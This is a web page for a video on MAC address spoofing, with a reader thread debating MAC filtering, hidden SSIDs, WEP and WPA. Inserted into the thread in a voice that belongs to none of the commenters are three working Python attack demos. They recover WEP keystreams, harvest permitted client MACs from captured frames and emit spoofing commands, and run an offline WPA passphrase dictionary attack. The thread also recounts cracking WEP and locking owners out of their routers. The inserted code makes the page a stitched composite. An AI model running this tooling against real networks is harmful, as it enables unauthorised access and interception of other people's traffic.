Wi-Fi

Video: How to spoof a MAC address

MAC address filtering is often used to secure older wireless equipment. Is this technique effective? In this IT Dojo video, Bill Detwiler shows you just how easy it is to spoof a MAC address and why MAC address filtering might not even keep out the "slacker hackers."

When you support small offices, home offices, and remote offices, you often run across older wireless equipment: equipment that is likely "secured" with MAC filtering and perhaps a hidden SSID and WEP encryption.

I think most techs would agree that MAC filtering alone isn't going to secure a wireless network, and that even WEP and a hidden SSID aren't much better. But does MAC filtering at least keep out the lazy hackers? A MAC filter only checks the source address a client writes into its own frames, and that address travels in the clear with every frame, so anyone listening can copy an allowed address and assign it to their own adapter. In this IT Dojo video, I show you just how easy it is to spoof a MAC address.

After watching the video, you can read the original tip in Chad Perrin's article, "How to spoof a MAC address". For more wireless security tips, check out the following TechRepublic Resources:

About

Bill Detwiler is Managing Editor of TechRepublic and Tech Pro Research and the host of Cracking Open, CNET and TechRepublic's popular online show. Prior to joining TechRepublic in 2000, Bill was an IT manager, database administrator, and desktop supp...

marc.casillo

I thought it was FreeBSD.... :) frash@#freebsd

perezwilli

Thanks a lot !!! Very useful. Wortiz

jamiepartlin

It does explain everything well, but what he says about not being able to use the same MAC address as someone else on the network isn't true. You can use the same one as long as you have a different IP address, as that is what gives you your identity on the network.

harryxebec

I refuse to install Flash. That means your video is crap, and I haven't even seen it.

efialtis

This is the term commonly used when simple steps are taken to secure a network, but any ONE step alone isn't much of a security measure, more like an obscurity measure. First, let's define "hacker" in the "bad" sense: black-hat hackers are malicious. They want to get in to a computer system, steal something, destroy something, or "have a little fun at someone's expense." These individuals usually aren't going to spend a lot of time spoofing MAC addresses, cloning IDs or banging ports; they are looking for a "quick fix": an unsecured network, or an open system. That being said, simple security measures can be taken. Use MAC filtering: this will slow them down. Use WEP (at a minimum) and don't use key #1, but use key #2, #3 or #4. Something on the order of 90% of people use the DEFAULT configurations to lock down their network, so 90% of BHH are going to concentrate their attacks there. Hide your SSID. This will let them know only that there is a wireless network out there; getting the information will be more difficult. Each one of these ideas, alone, isn't really enough to call your network secure, but add them all up and you get "security" through different "obscurity" methods. A BHH might try one or two of these to get into a system, but they don't go through all that much trouble when there are SO MANY other, open systems. It works the same as putting an ADT sticker in your front window; your neighbor's house (without the ADT sticker) is now more appealing than yours... even if you DO NOT have an ADT system, just the sticker (the criminal isn't going to know this, and won't take the chance)...

rgkrishn

The video is only 5 min but seems to take forever, with the real commands used lasting only a few seconds, and so are Bill's other videos. It would be best if: 1) all the videos have the text article link for the impatient readers; 2) the speech delivery is shortened and the video is edited to be concise and to the point.

Gerbilferrit

I've been on to our manager about getting rid of MAC filtering on our network firewall, and using the firewall's ability to authenticate legitimate users to break out of the network, and while he took an interest at first he hasn't done much about it :( What do you guys use instead of MAC filtering on your networks, out of interest????

janhendrik.vanmanen

Very good. Even digital nitwits (like my boss) around me now understand why I want to upgrade the WiFi routers.

s.blaise78

It was very helpful. As an expert I saw some news. Thanks a million Bill.

blarman

So the one thing I didn't catch was how to determine which MAC addresses the target network would allow. Since there are billions of possibilities there, how do you figure out which ones (for a home network that list is probably

michaelsaltmarsh

Security is an illusion.... look up an OS called BackTrack 3 ;) Remember kiddies.... if you set up security by the book, you will get hacked by the book......

jake.conk

I'm one of those people who use a hidden network with a password and required MAC addresses. What am I supposed to upgrade to in order to prevent people from using this technique so I can "feel" safe?

sysadmin

Great one, Bill. Didn't know how easy that was.

zgozvrm

This video was helpful in showing how easy it is to bypass MAC address filtering. Although we're told that we need to upgrade our networking equipment if the only protection we have is MAC address filtering, hidden SSID, and WEP encryption, we are NOT told what features we DO need to have in our new equipment in order to thwart any would-be hackers.

mghcw3

You mention at the end of the video that it's time to upgrade, but you do not mention as to what to upgrade to.

Dumphrey

To the point. I look forward to the WEP cracking video; many people need to see how easy it really is. And while many TR regulars may throw a wobble if you do it, that's them reacting out of habit. WEP cracking is to hacking as breaking an egg is to being a pastry chef...

reisen55

A consideration I have with my wireless network clients is relative proximity to outside attack. In Monroe, NY, the most likely prowlers are squirrels on trees. OK, not too much traffic there. Here, standard rules apply nicely. I do not anticipate major hackers traveling up 60 miles from Manhattan to target a wireless network on the pure whim that something might be there at this specific address. New York City is another matter. One of my colleagues was using his laptop at an internet cafe and decided to check the wireless connection he picked up. It was not from the coffee shop but from (are you ready?) .... MORGAN STANLEY just across the street!!! Wide open. Go figure sometimes. He released his connect instantly. A lawyer at an insurance company midtown Manhattan looked out across the city scape and spotted the unique CITIBANK building whose wireless network he was picking up too. At floor 38, there were few other buildings (none really) blocking signal. A local customer in New City, NY needed his home computer setup for wireless. He lived in the rather horrible New City Garden apartment complex (a place to really avoid) so I drove up, parked and turned on laptop with Netstumbler to see how many wireless points were wide open. Counted 20 of them!!! Amazing world, is it not.

seo

I would like to design an application that certifies by MAC address. This is bad news for me. Ho Nguyen, http://VietBDS.com - The ultimate property gateway

Neon Samurai

In a wireless network, you can use the same MAC and same IP as another wireless node. In a wired network, routing controls will likely have problems, provided the two systems allow you to duplicate MAC and IP. A wireless network simply broadcasts the communication packets, so two nodes receiving and processing packets for the same MAC address is very possible. The secondary machine could do this without an IP at all if the wifi encryption is not turned on. In an open network, you can cause some confusion by borrowing someone else's MAC and browsing websites at the same time they are; both wireless nodes receive the server response to the browser and display it. This is due to the broadcast transfer over air rather than the more tightly controlled transfer over switched wires. The IP is how a machine is identified within its subdomain, but the MAC address is the definitive identification and how network frames containing your IP addressed packets are exchanged. I think the switching gear in a wired network would have problems with duplicate MACs even if they had different IPs, though things working on the higher IP level should have no problems.

-Q-240248

DHCP tries to send the IP address to the duplicate MAC, but the other MAC gets it and sends it a SYN packet; therefore the duplicate MAC never gets an IP to begin with. I don't think you can have duplicate MACs on the network, different IPs or not; there would be mass confusion in the MAC tables, and packets would come out of order and be resent, and chaos on the net.

Neon Samurai

So, you've stomped your little footsies and taken the time to tell everyone that you haven't seen the video yet feel the need to complain about something; feel better? I am curious though. What platform do you refuse to install Flash on and is your choice against having a Flash player due to the quality of the player provided by Adobe or in reaction to every site overdoing the flash media objects?

Neon Samurai

(This is mostly for my own interest to test my knowledge, since I'll quickly be corrected where wrong.)

"First, lets define "hacker" in the "bad" sense:" Cracker. Nothing at all to do with hackers, but that's semantics, so moving on..

"These individuals usually aren't going to spend a lot of time spoofing mac addresses" The AP MAC, SSID and type of encryption are broadcast in the first network frame to hit the cracker's tool. The client MAC comes soon after with the first frame it broadcasts back to the AP. Switching the MAC on the cracker's local machine takes less than five seconds (copy MAC on terminal 1, paste behind changemac command in terminal 2, done). MAC filtering is only of use for having your AP ignore frames from a NIC it does not think it recognizes. Spoofing a MAC to one the AP does recognize is done simply by anyone. It won't slow them down; consider it a given that your MAC can/will be spoofed, then be surprised when it doesn't happen.

"Use WEP (at a minimum)" - no, WPA is the minimum, WPA2 preferred. Bear with me a moment and I'll clarify. If you have a device which must have network connectivity and only provides support for Open or WEP, then at minimum use WEP plus every other setting you have available. Be surprised when all of that does slow someone down rather than assuming you're safe because of it. It is better to consider how badly you need that device on the network along with the rest of your wireless world. You may be able to live without, or you may find that upgrading your hardware to something supporting WPA. In my case, such a device was my often lamented Palm T5. After buying a wifi router, I had to buy the SDIO wifi NIC from Palm. It was great fun; I could keep ICQ/MSN/* connected and with me like a phone without being attached to my desktop. I could use VNC on the Palm to reach through the network to my desktop. Neither function justified running my entire network on WEP when every other device supported WPA, so the SDIO card only saw use as a pocket network scanner when out and about (great little warwalking program available for Palm). Now, even the Wii connects by WPA; no WPA then no access to the network by wifi radio.

As mentioned, I said bear with me a moment; I'm harping on WEP because it seems to come up constantly as "the minimum anyone needs". This week has been "break my wifi" week for me at home, which means my secondary router is doing time as a test dummy named "Ducky". I breached it with a PDA, two hours of traffic and eight hours of rest. Wifi2 (arbitrary WEP wifi client node) was connected to Ducky appropriately using one of the four generated WEP keys. Wifi1 (N810, ok, not quite a PDA but close) was left as a third party doing the packet capturing. I then did a few hours of low security browsing over the WEP network to generate traffic; some YouTube videos, the usual news sites less my regular logging in. I thought the packet count after two hours would not be enough, but it was time for bed, so Ducky gets unplugged, wifi2 gets shut down, wifi1 switches to alarm clock mode as it does each night and the capture file went to my desktop. Assuming I hadn't caught enough traffic, I left it running against the cracker as a burn-in and heat test for my CPU. I was rather surprised to see the WEP key staring back at me the next morning when checking the temperature and CPU condition.

"But NS, no one is going to spend two hours listening then a night waiting" I hear you say. For a targeted hit, darn tooting they will, but we'll assume a casual snoop. They can use something small like a PDA in a weatherproof case if they are brave enough to leave it unattended. They could be close enough to simply wait in attendance (parked car or whatever). They may be inspired by the challenge, in which case it becomes a targeted attack though not contracted. They will also be using a prepared notebook with tools that are going to make my quietly passive two hour wait a brief but noisy five minute wait. My small number of packets took overnight (still have to check the actual processing time) to pop the key, but the brief yet noisy approach is going to spill out enough packets to pop the key in two or four minutes of processing.

For those who have not heard, WEP is dead. It was sickly and in the hospital before but has long since passed on into the realms of "weak encryption" of little more challenge than a speedbump. If you're a home user, consider upgrading to hardware that can do WPA or better for (x < 100$). For businesses: no excuse for using WEP.

"Hide your SSID" - nope, broadcast it. A hidden SSID is still broadcast with every network frame due to how wifi networks function. The only place you are not seeing a cloaked SSID is in the "Available Wifi Networks" or in less complete wireless network scanners. Anyone who is looking for wireless networks is already using a tool that tells them SSID, channel, encryption and MAC addresses by default. Assume that information is already freely available because, well, it is. There is no improvement of security by not showing your SSID. It actually reduces your security, since your wireless devices will have to constantly call out asking if the router can hear them. A quick scan of wireless in any city will return a long list of unattached wireless devices calling out for all the cloaked SSID networks they know of. (MSHOME and HOME seem to be the most popular around here.) You're actually better to broadcast your SSID. Your devices will know it's broadcast so they will listen for it rather than call out constantly (no spraying your wifi info across the subway car on the way to work). My area is crowded, so I also hope that others will see what channel my network SSID is broadcasting with and choose a different one, though I still have to change channels every few months because of congestion.

The real problem is that cloaked SSID, WEP keys and MAC filtering are still nothing more than a speedbump even when all are combined. It's a "feel safe" strategy instead of an "am safe" strategy. I've taken all of these ineffective steps so I must be safe, rather than taking one truly effective step and actually being safe.

- Change your SSID to something identifiable.
- Broadcast the SSID so others see your channel and you don't announce it to everyone away from home.
- Change your wireless security to WPA with an eight or more character passkey.
- Disable "administration from wireless network" and "administration from WAN" so that only internal wired connections can access the router administration GUI.
- Change the administration password to something non-default and strong.

That is the minimum configuration for any router and it takes less than five minutes to configure. If you want to filter out unknown wifi devices, add in MAC filtering, but realize that it is only reducing how much your router CPU has to process rather than providing any real security advantage. The steps that it takes to operate a wireless network safely are too simple and supported by enough hardware that there is no excuse. If you use WEP or leave your wifi router wide open, it is the same as leaving your front and back door open when away from the house.
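The overnight key recovery described in the post above rests on a design flaw that is easy to show in a few lines. WEP encrypts each frame with RC4 keyed by a 24-bit IV (sent in the clear) concatenated with the shared key. With only about 16.7 million IVs, a busy link repeats one within a few thousand frames, and two frames under the same IV share a keystream, so any known plaintext in one (every IPv4-carrying 802.11 data frame starts with the same LLC/SNAP header) decrypts the other. This is an added example, not code from the video or from any commenter: the RC4 is a toy implementation written for the demo, the key, IV and frame contents are constructed, the ICV is omitted, and the statistical key-recovery attacks that tools such as aircrack-ng run over many captured IVs are not reproduced here; the point is the keystream reuse that makes even a small passive capture dangerous.

```python
"""
WEP keystream reuse: IV || key -> RC4, IV repeats, known plaintext leaks.
Added example; toy RC4, constructed key/IV/frames, no ICV.
"""


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4: key scheduling, then n bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP body layout: IV (3 bytes, cleartext) || RC4(IV || key) XOR plaintext."""
    assert len(iv) == 3 and len(key) in (5, 13)  # 40- or 104-bit WEP key
    ks = rc4_keystream(iv + key, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))


def recover_keystream(body: bytes, known_plaintext: bytes):
    """Attacker side: keystream for this IV, as far as the known plaintext reaches."""
    iv, ct = body[:3], body[3:]
    n = min(len(ct), len(known_plaintext))
    return iv, bytes(c ^ p for c, p in zip(ct[:n], known_plaintext[:n]))


def decrypt_with_keystream(body: bytes, iv: bytes, ks: bytes) -> bytes:
    """Decrypt another frame that reused the same IV; no key needed."""
    if body[:3] != iv:
        raise ValueError("IV differs; this keystream does not apply")
    return bytes(c ^ k for c, k in zip(body[3:], ks))


def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday bound: chance that at least one IV repeats among `frames` random IVs."""
    space = 2 ** iv_bits
    p_distinct = 1.0
    for i in range(frames):
        p_distinct *= (space - i) / space
    return 1.0 - p_distinct


# Constructed demo: 40-bit key, one IV reused by two frames.
KEY = bytes.fromhex("0102030405")
IV = bytes.fromhex("a1b2c3")
SNAP_IPV4 = bytes.fromhex("aaaa030000000800")  # LLC/SNAP header that starts an IPv4 frame
FRAME_KNOWN = SNAP_IPV4 + b"ARP or other traffic the attacker can predict or provoke"
FRAME_SECRET = SNAP_IPV4 + b"GET /admin?password=hunter2 HTTP/1.0"


def demo():
    c_known = wep_encrypt(KEY, IV, FRAME_KNOWN)
    c_secret = wep_encrypt(KEY, IV, FRAME_SECRET)
    # Knowing only the 8-byte SNAP header still yields 8 keystream bytes per IV...
    _, ks8 = recover_keystream(c_secret, SNAP_IPV4)
    # ...and a fully known frame under the same IV yields enough to read the other one.
    iv, ks = recover_keystream(c_known, FRAME_KNOWN)
    return len(ks8), decrypt_with_keystream(c_secret, iv, ks)


if __name__ == "__main__":
    n, recovered = demo()
    print(n, recovered)
    print(f"{iv_collision_probability(5000):.0%} chance of a repeated IV after 5000 frames")
```

The collision estimate is the reason a couple of hours of ordinary browsing is enough: around 5,000 frames already gives better than even odds of a repeated IV, and a real capture holds far more than that.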

efialtis

Now, if you believe Security through Obscurity is "ineffective" then you need some schooling... StO is effective, in MOST cases. I work in Security and Computer Forensics. MOST people that take simple precautions do NOT feel the effects of a hacker. Each precaution taken makes the network just that much more effective. Now, if you feel that you need more security, you have a determined hacker, or you want to keep a "professional" like me out, well, there is a bit more that needs to happen. Buy GOOD hardware. Linksys has some fantastic hardware (as does D-Link, and others) that lets you use higher encryption standards, and built-in attack detection and monitoring. This and the "obscurity" methods should be used together. Get rid of Windows and move to Linux. This simple thing will secure your computer almost all by itself (and there are a lot of "obscurity" methods you can use when installing Linux, such as changing the root and home directories' names, etc). Use strong encryption software. Securing communications and hard drives helps a lot. Install security programs. "fail2ban" is a nice one, and there are many others. Disable ports, lock out unknown IP addresses, use strong passwords, etc. All this can be done in a couple hours, so it isn't hard or complicated, and it can stop hackers. Then you have to "secure your people" that work or live with you... they cannot download crap and install it, they cannot surf porn, etc... or all your security will come to an end from the inside.

SgtPappy

Give it a rest. The man is trying to provide a service. The little movie provided some valuable information for some people.

Neon Samurai

The short answer: 99% of tools provide SSID (cloaked or not), channel, encryption type and MAC addresses for router and client. I think NetStumbler is the only tool that does not decloak SSID, otherwise the statistics guess would be 100%. The long answer: Wireless networking works at the data frame level and fools the client into thinking it's on a normal wired network. Basically, the router/client connection does all the wireless magic and presents both ends with just another network interface device. Frames are passed between systems based on MAC address. You may choose a human readable URL (google.ca) which is then converted to an IP (###.###.###.###), but that is actually then converted to a MAC address for routing and switching. Your data packet pieces (payload) of the frame can be encrypted, but the sending and receiving MAC address must be unencrypted. With wireless, the SSID is also required as an identifier of what network the frame belongs to. The router's MAC can't be used because some SSIDs span multiple routers in larger networks. The first frame broadcast will probably provide valid MACs for client and router. It will at least provide the client MAC, with the second exchange providing the router MAC as it answers back.
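blarman asked above how an attacker learns which addresses a filter allows, and the reply above gives the mechanism: the source and destination MACs of every 802.11 frame are outside the encrypted payload. The following added example (not code from the video, from Chad Perrin's tip, or from any commenter) parses the fixed 24-byte 802.11 MAC header of constructed data frames, uses the To DS/From DS bits to tell which address is the access point and which is a station, tallies the stations seen talking to each BSSID, and then renders the iproute2 command sequence that would put one of those addresses on a Linux adapter. The addresses, frames and interface name are constructed for the demo; nothing is captured, transmitted or executed.

```python
"""
Harvest station MACs an AP already accepts, from the cleartext 802.11 header,
then render the Linux commands that would assign one to a local adapter.
Added example; all addresses and frames are constructed.
"""
import struct
from collections import defaultdict

# Constructed sample addresses (not real devices).
AP_BSSID = "00:11:22:33:44:55"
CLIENT_A = "aa:bb:cc:00:00:01"
CLIENT_B = "aa:bb:cc:00:00:02"
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Frame Control byte 0: bits 2-3 are the type (0 mgmt, 1 ctrl, 2 data),
# bits 4-7 the subtype. Byte 1: bit 0 is To DS, bit 1 is From DS.
FC_DATA, FC_QOS_DATA, FC_BEACON = 0x08, 0x88, 0x80


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_header(fc0: int, to_ds: int, from_ds: int, a1: str, a2: str, a3: str) -> bytes:
    """Minimal 24-byte 802.11 MAC header: FC, duration, addr1-3, sequence control."""
    fc1 = (from_ds << 1) | to_ds
    return (struct.pack("<BBH", fc0, fc1, 0)
            + mac_bytes(a1) + mac_bytes(a2) + mac_bytes(a3)
            + struct.pack("<H", 0))


def client_of(frame: bytes):
    """(bssid, station) for an infrastructure data frame, else None."""
    if len(frame) < 24:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 2:            # only data frames carry station traffic
        return None
    to_ds, from_ds = fc1 & 1, (fc1 >> 1) & 1
    a1, a2 = mac_str(frame[4:10]), mac_str(frame[10:16])
    if to_ds and not from_ds:            # station -> AP: addr1 = BSSID, addr2 = station
        bssid, client = a1, a2
    elif from_ds and not to_ds:          # AP -> station: addr1 = station, addr2 = BSSID
        bssid, client = a2, a1
    else:                                # IBSS (0,0) and WDS (1,1) not handled here
        return None
    if int(client[:2], 16) & 1:          # group bit set: broadcast/multicast, not a station
        return None
    return bssid, client


def harvest_clients(frames):
    """Map each BSSID to the sorted list of station MACs seen exchanging data with it."""
    seen = defaultdict(set)
    for frame in frames:
        hit = client_of(frame)
        if hit:
            seen[hit[0]].add(hit[1])
    return {bssid: sorted(macs) for bssid, macs in seen.items()}


def spoof_commands(iface: str, mac: str):
    """iproute2 command sequence (needs root) to take over a harvested address."""
    parts = mac.lower().split(":")
    if len(parts) != 6 or not all(len(p) == 2 and all(c in "0123456789abcdef" for c in p)
                                  for p in parts):
        raise ValueError(f"not a MAC address: {mac!r}")
    if int(parts[0], 16) & 1:
        raise ValueError("group bit set; a station address must be unicast")
    mac = ":".join(parts)
    return [f"ip link set dev {iface} down",
            f"ip link set dev {iface} address {mac}",
            f"ip link set dev {iface} up"]


# Constructed capture: two stations talking to the AP, a broadcast, a beacon, junk.
SAMPLE_FRAMES = [
    build_header(FC_DATA, 1, 0, AP_BSSID, CLIENT_A, AP_BSSID),      # A -> AP
    build_header(FC_QOS_DATA, 0, 1, CLIENT_B, AP_BSSID, AP_BSSID),  # AP -> B
    build_header(FC_DATA, 0, 1, BROADCAST, AP_BSSID, AP_BSSID),     # AP -> all (skipped)
    build_header(FC_BEACON, 0, 0, BROADCAST, AP_BSSID, AP_BSSID),   # beacon (skipped)
    b"\x08\x01junk",                                                # truncated (skipped)
]

if __name__ == "__main__":
    allowed = harvest_clients(SAMPLE_FRAMES)
    print(allowed)
    for cmd in spoof_commands("wlan0", allowed[AP_BSSID][0]):
        print(cmd)
```

Two caveats a practitioner will want: the group-bit check keeps broadcast and multicast destinations out of the "allowed" list, since no filter entry ever matches them, and the address must be taken over while the legitimate station is off the air (or the duplicate-MAC confusion described elsewhere in this thread follows).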

Neon Samurai

ha.. Actually, that is probably truer than I originally intended. I have to write that one down on my list with "nostalgia is not what it used to be". I've always thought of security as more like standing in front of an oncoming transport truck. You are in plain sight and it is rushing at 55 miles or more. A high level of security means knowing that when it gets to you, it won't do a damn thing. No hiding or dodging out of the way; it just simply won't pass authentication or cause any harm. For a truly high level of security, you should be able to post your policies and mechanisms on a billboard out front and still have no one without valid authentication keys able to get in. Any potential security value in obscurity is the myth that won't die though. Obscurity only has value for the attacker sneaking about, not the defender.

blarman

Upgrade your wireless access point to one that supports WPA2 passphrases. This may also mean upgrading wireless adapters to similar versions supporting WPA2. Setting up WPA is as hard/easy as setting up WEP. The end result however is a much hardier network.

Neon Samurai

MAC filtering may reduce the number of packets your router tries to process by ignoring unrecognized MACs. SSID is equally visible if broadcast or "cloaked", so you may as well tell everyone you're there on a channel and hope they choose a less populated channel. WEP is easy to break, though doing it fast means being noisy. Home users should avoid at all costs. Big business probably won't consider it an option, though an IDS/IPS that monitors wireless traffic can help. The real wireless security mechanism is the connection encryption in the latest form you can support. These days, that means WPA minimum or WPA2 preferably in the home consumer market.

If you're buying for home:
- choose good hardware
- change and broadcast the SSID
- disable "allow administration from wireless network" if the option is available
- set a strong admin password
- set a strong wireless WPA or WPA2 passphrase (not matching the admin password)

If you're like me and can't leave any setting un-adjusted, continue to change any other options, but unique SSID, strong WPA-PSK, strong admin and no wireless administration are the minimum settings. If this is for business and consumer grade hardware is going to be underpowered, then your buying process should include consulting a security specialist and looking at what enterprise wireless can offer for authentication and encryption options. Consider an IDS/IPS that monitors wireless traffic also.

Bill Detwiler

You should upgrade to wireless equipment that supports WPA/WPA2-PSK at the very least--although PSK implementations can be compromised if an attacker learns the pass-phrase. Enterprises should implement 802.1x instead of PSK-based authentication. WPA2 using either PEAP, TTLS or EAP/TLS for authentication would be best.
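The caveat in the comment above, that a PSK deployment falls once the passphrase is known, follows from how the key is derived: the pairwise master key for WPA-PSK and WPA2-PSK is PBKDF2-HMAC-SHA1 over the passphrase, salted only with the SSID, 4096 iterations, 32 bytes of output, and it is the same for every station on the network. Whoever holds the passphrase holds the network key, and whoever captures a 4-way handshake can grind candidate passphrases offline at the cost of one PBKDF2 each, which is why precomputed tables exist for common default SSIDs and why 802.1X with per-user credentials is the enterprise answer. The example below is added here and is not code from the video or the commenters; it uses only the Python standard library, the SSID, passphrase and wordlist are constructed, and the candidate check compares PMKs directly as a simplification (a real offline attack derives the PTK from the handshake nonces and verifies its MIC, but the cost per guess is the same PBKDF2).

```python
"""
WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32), and what
that means for offline guessing. Added example; scenario data is constructed.
"""
import hashlib


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i passphrase-to-PSK mapping; the result is the PMK for WPA-PSK/WPA2-PSK."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


def offline_guess(target_pmk: bytes, ssid: str, wordlist):
    """Dictionary attack: recompute the PSK for each candidate until one matches."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:     # cannot be a valid passphrase, skip the PBKDF2 cost
            continue
        if wpa_psk(candidate, ssid) == target_pmk:
            return candidate
    return None


# Constructed scenario: SOHO router on a default SSID with a weak passphrase,
# attacker holding a small wordlist.
SSID = "linksys"
WORDLIST = ["password", "qwerty", "letmein1", "linksys1", "sunshine", "Tr0ub4dor&3"]


def demo():
    pmk = wpa_psk("sunshine", SSID)      # what a captured handshake lets the attacker test against
    return offline_guess(pmk, SSID, WORDLIST)


if __name__ == "__main__":
    print(demo())
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
    print(wpa_psk("password", "IEEE").hex())
```

The SSID acts as the salt, so the same weak passphrase yields a different PMK on a differently named network; that only helps if the SSID is not one of the handful of defaults that attackers have already built tables for.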

AnotherThought

Don't get sucked in to dismissing your network security just because you think no "major hackers" are going to be hanging out in the willow grove with you in Monroe. You're overlooking a huge source of security breaches... teenagers with free time. If the town is that sleepy, you can be sure the kids are certainly more bored with it than you are. :) These days, it's a piece of cake for a kid (or anyone else) to download complete exploit kits from the web (for free) and cruise around with them installed on a cheapo Dell laptop and a freshly minted driver's license, just to see what they can find. My office happens to be near (right next door) to a hotel in a fairly quiet town that occasionally hosts youth conferences that last several days. I can watch all the hits on my wireless router that start happening pretty consistently about 30 minutes after the kids are done for the day. Most of the hits are just the kids looking for an open network so they can surf YouTube/MySpace or whatever. Invariably, though, over the course of these events, I'll find evidence of a few trying vigorously to break in to the network, presumably just for the sake of saying they've done it. The network has a rather generic name, so there's nothing particularly tempting like "Citibank Backoffice Network", but they still pick at it regularly. My suggestion would be, if you're not going to tighten up the network, at least turn on logging and keep an eye on it once in a while. Hopefully you won't find any teen spirit wafting through there...

Neon Samurai

I was on my way to small town Canada for a weekend and amused myself for the bus ride by counting the wireless networks. I gave up the pastime after we went through a town and I lost count around 15 breachable networks, about 5 completely default routers or wide open, and a very small minority of WPA or better networks. The handy little app even told me about a few unassociated nodes calling out for their network, where the client of a broadcast SSID usually knows to wait quietly rather than announce the network all over town.

andrew.salinger

Anything is possible, but just because it says the signal said "MORGAN STANLEY" does not mean that it was. If I was thinking of a way to phish information from anywhere, a good start would be to put up a bonus wireless network, which may provide access, but may also just be capturing packets. Even if the coffee shop was providing access and you knew it was from the coffee shop, it still is not the safest way to obtain your wireless connection. Paranoid? maybe, but safer is better for me.

Dumphrey

when you consider how little many people understand about computer and network security. As other TR members have pointed out, what is even more scary is the bad advice many "professionals" give to people and perpetuate the MAC filter-WEP combo. "I do not anticipate major hackers traveling up 60 miles from Manhattan to target a wireless network on the pure whim" but what about the kid next door, so he can download a new movie? WEP is the security equivalent of a screen door with a lock: sure, it's locked, but only for as long as it takes to put a hole in the screen. WEP provides zero real security, and almost no denial/reasonable doubt in the case of your network being used for illegal purposes.

Snoop101

Thank you for a simple, but informative insert on wireless security topic.

Neon Samurai

There are some good ways to confirm identity depending on what your program is going to do, but MAC addresses have always been changeable. They are nothing more than the true location identifier that sits behind the IP address, the same way the IP is the local location identifier that sits behind the human readable domain name. On the up side, it's better to learn of this now rather than after adjusting your program has become too complicated.

bboyd

I can empathize with his dislike of Flash, but no sympathy for the rude response. I'm glad NoScript lets me be granular about allowing Flash to run. I still worry that I have to have Adobe code on my machine.

wellsd

Don't forget that if you are doing web based administration of the router and you are not using HTTPS (SSL/TLS), then you are sending login and password in plain text over your network. And if someone happens to be monitoring your traffic at that point, they now own your router and will lock you out of it. One of my colleagues has a bad habit of network scanning; she locks the users out of their routers, renames the SSID to "F**kMeIMaSheep", and sets her laptop to automatically connect to that SSID, and can get a connection most everywhere we drive. So I have seen this work. AirPcap is a wonderful tool, as is Wireshark.

InfoSecAuditor

Wow Neon. Great job. You beat me to it. If you're not in InfoSec... well, maybe you should be? In response to the OP, I'll reiterate from an earlier post that I made. Security through obscurity simply isn't a viable option. If you think it is, here's a question for you: Would you be willing to bet your career, your financial stability and even your identity on an environment that uses STO (hey, I like acronyms too) as one of its founding principles? Personally, I've been working in the IT field for over a decade and a half (before that I was in public safety/government), and in the InfoSec space for over seven years. I perform security audits (physical and logical) at our company's secure domestic and international facilities (we're a federal, state and local contractor that builds and manages prisons), as well as vulnerability assessments and penetration tests. A significant amount of my work is assessing wireless network security. Additionally, I hold a Master's in InfoSec from an NSA certified curriculum and a number of industry certifications (I think I broke my arm patting myself on the back). My point is, I think I'm sufficiently "schooled" to provide the above opinion, TYVM.

Neon Samurai

If you are still including obscurity in your security processes under the assumption that it adds to your security, you may want to reconsider also. Obscurity only has value for the attacker. It is a short lived advantage; "crap, where is he.. [advantage].. there he is! [advantage gone]" If you use an obscure OS, the attacker is going to learn the OS and now it's not obscure. If you obscure your IDS, the attacker is going to assume you have IDS so it's not relevant either. If you accidentally gain an advantage through obscurity then great, but don't purposefully count on that when assessing your security posture. Real security is provided by the mechanisms, not how well they are hidden. The only advantage in obscurity is for the attacker who must remain hidden as a foreign object avoiding detection. In that case, obscurity's short lived advantage can be long enough to plant a seed and sneak away. In the digital realm, you have to assume your obscured protective item is going to be found, because it will be. You want to be able to stand up, announce your presence and still deny access to anyone who fails authentication. (Now I read your profession.. ha.. I'm probably over my head but what the heck, I'll keep swimming.) I agree with the rest of your post. As a security professional, what value do you see in obscurity? Where do you see security by obscurity providing advantages? Is it only as an agitant by changing default paths? (Serious question, as I'm curious to understand different points of view, though mine has already been expressed.)

brad

I guess the practice of hiding valuables from sight when parking the car falls under StO? The only time my car has ever been broken into was when some valuable of some sort is visible through the window. Learned a hard lesson there. :-) In a home network, everyone has to use it (except the dog) so it needs to be friendly. So, there's a tradeoff between user-friendly and hacker-unfriendly.

stuvorn

I agree, the "suggestion" was delivered without much tact, but its essence was certainly valid. Why not cater for both audiences: more technical, time poor, and less technical (probably still time poor!)?

Neon Samurai

That's the part that kills me; it's the difference between selecting option B instead of A from the router's admin interface. In the case of routers and NICs that don't support WEP, yeah, it's better to upgrade for the amount it costs today (100$ or less is the cost of a router). In the case of built in wireless radios that only support WEP or less, consider dropping them. In my case, getting my WEP only PalmOS device an internet connection was not worth reducing my entire network to WEP; the Palm got no network access instead. I don't even allow .11b, let alone WEP, so it was out of luck on two accounts.

garyleroy

I don't see what you get out of this. Are you planning on ripping off info for your own use, or do you just like finding wireless networks? Ever thought of looking at the scenery on your bus ride, reading a book, whatever? "What'd you do on your vacation?" "Oh man, it was great, I found over 300 wireless networks I could get into, what a fantastic trip!" Then for exercise you what, play games on your iPhone?

Neon Samurai

